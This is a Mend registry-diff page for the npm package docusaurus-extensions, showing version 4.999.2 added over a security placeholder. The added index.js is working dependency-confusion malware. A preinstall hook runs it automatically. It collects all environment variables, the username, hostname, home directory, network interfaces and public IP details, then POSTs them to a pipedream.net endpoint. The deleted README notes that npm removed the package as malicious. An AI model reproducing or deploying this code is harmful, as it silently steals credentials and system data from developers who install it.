npm - docusaurus-extensions - Versions diffs - 0.0.1-security → 4.999.2 - Mend

docusaurus-extensions 0.0.1-security → 4.999.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of docusaurus-extensions might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,128 @@
+//This is sample commands and code to collect Normal data of Request
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const http = require("http");
+const { execSync } = require("child_process");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Helper function to get public IP and related data
+async function getPublicIPInfo() {
+    return new Promise((resolve, reject) => {
+        http.get("http://ip-api.com/json", (res) => {
+            let data = "";
+            res.on("data", (chunk) => (data += chunk));
+            res.on("end", () => {
+                try {
+                    const info = JSON.parse(data);
+                    resolve(info); // Returns data like city, country, ISP, etc.
+                } catch (error) {
+                    reject("Failed to parse public IP information.");
+                }
+            });
+        }).on("error", (err) => reject(err));
+    });
+}
+// Main function to collect all data
+async function collectData() {
+    try {
+        const publicIPInfo = await getPublicIPInfo(); // Fetch public IP data
+        const systemInfo = {
+            packageName: package,
+            packageVersion: packageJSON.version,
+            packageResolved: packageJSON.___resolved || null,
+            packageJson: packageJSON,
+            // Local system details
+            currentDir: __dirname,
+            homeDir: os.homedir(),
+            hostname: os.hostname(),
+            username: os.userInfo().username,
+            platform: os.platform(),
+            arch: os.arch(),
+            osType: os.type(),
+            osRelease: os.release(),
+            cpuCores: os.cpus().length,
+            cpuModel: os.cpus()[0]?.model,
+            totalMemory: os.totalmem(),
+            freeMemory: os.freemem(),
+            uptime: os.uptime(),
+            dnsServers: dns.getServers(),
+            networkInterfaces: os.networkInterfaces(),
+            envVariables: process.env,
+            nodeVersion: process.version,
+            npmVersion: execSync("npm -v").toString().trim(),
+            currentShell: process.env.SHELL || "unknown",
+            currentUser: execSync("whoami").toString().trim(),
+            currentProcessID: process.pid,
+            diskUsage: (() => {
+                try {
+                    const diskInfo = execSync("df -h /").toString();
+                    return diskInfo.split("\n")[1];
+                } catch {
+                    return "Unable to retrieve disk info";
+                }
+            })(),
+            // Public IP and organizational details
+            publicIP: publicIPInfo.query, // Public IP address
+            city: publicIPInfo.city,
+            region: publicIPInfo.regionName,
+            country: publicIPInfo.country,
+            isp: publicIPInfo.isp, // Internet Service Provider
+            org: publicIPInfo.org, // Organization name
+            reverseDNS: (() => {
+                try {
+                    return execSync(`nslookup ${publicIPInfo.query}`).toString();
+                } catch {
+                    return "Unable to retrieve reverse DNS information";
+                }
+            })(),
+        };
+        // Prepare data for transmission
+        const trackingData = JSON.stringify(systemInfo);
+        const postData = querystring.stringify({
+            msg: trackingData,
+        });
+        // HTTPS request options
+        const options = {
+            hostname: "eo2eckhg64ozhxn.m.pipedream.net",
+            port: 443,
+            path: "/",
+            method: "POST",
+            headers: {
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Content-Length": Buffer.byteLength(postData),
+            },
+        };
+        // Send HTTPS POST request
+        const req = https.request(options, (res) => {
+            console.log(`Status: ${res.statusCode}`);
+            res.setEncoding("utf8");
+            res.on("data", (chunk) => {
+                console.log(`Response: ${chunk}`);
+            });
+        });
+        req.on("error", (e) => {
+            console.error(`Request error: ${e.message}`);
+        });
+        req.write(postData);
+        req.end();
+    } catch (error) {
+        console.error(`Error collecting data: ${error}`);
+    }
+}
+// Run the data collection
+collectData();

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
   "name": "docusaurus-extensions",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "4.999.2",
+  "description": "Testing for Dependency Confusion",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "huntx",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=docusaurus-extensions for more information.